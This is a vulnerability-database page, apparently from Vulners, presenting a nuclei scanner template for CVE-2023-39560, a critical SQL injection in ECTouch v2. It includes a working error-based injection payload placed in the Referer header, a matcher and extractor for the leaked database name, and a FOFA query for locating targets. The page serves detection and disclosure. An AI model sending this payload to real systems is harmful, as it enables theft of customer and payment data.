Lucene search
K

ECTouch v2 - SQL Injection

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 121 Views

ECTouch v2 SQL Injection via $arr['id'] parameter at \default\helpers\insert.php, severity: critica

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-39560
28 Aug 202317:15
attackerkb
Circl
CVE-2023-39560
28 Aug 202320:16
circl
CNNVD
ECTouch SQL注入漏洞
28 Aug 202300:00
cnnvd
CVE
CVE-2023-39560
28 Aug 202300:00
cve
Cvelist
CVE-2023-39560
28 Aug 202300:00
cvelist
NVD
CVE-2023-39560
28 Aug 202317:15
nvd
OSV
CVE-2023-39560
28 Aug 202317:15
osv
Prion
Sql injection
28 Aug 202317:15
prion
Positive Technologies
PT-2023-27022 · Ectouch · Ectouch
28 Aug 202300:00
ptsecurity
RedhatCVE
CVE-2023-39560
23 May 202504:11
redhatcve
Rows per page
id: CVE-2023-39560

info:
  name: ECTouch v2 - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.
  impact: |
    Unauthenticated attackers can exploit SQL injection through the $arr['id'] parameter to extract database contents, potentially stealing customer data, order information, and payment details from the ECTouch e-commerce system.
  remediation: |
    Update ECTouch to a version newer than 2.0 that uses parameterized queries or prepared statements for the id parameter in default/helpers/insert.php.
  reference:
    - https://wiki.bachang.org/doc/2582/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39560
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-39560
    cwe-id: CWE-89
    epss-score: 0.04109
    epss-percentile: 0.89567
    cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ectouch
    product: ectouch
    fofa-query: icon_hash="127711143"
  tags: cve,cve2023,ectouch,sqli,vuln

http:
  - raw:
      - |
        GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
        Host: {{Hostname}}
        Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error: '~[^~]+~'<br>"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "XPATH syntax error: '~([a-z0-9]+)~'"
# digest: 490a0046304402207e108583a30f00564bf5f8956c4befa63c052c843170d3f574df03146c53762102206f2d8e15cf6e5786aad83d7076d08b83ca66cc44efdd572cbea7f59e9f03ec40:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.04109
SSVC
121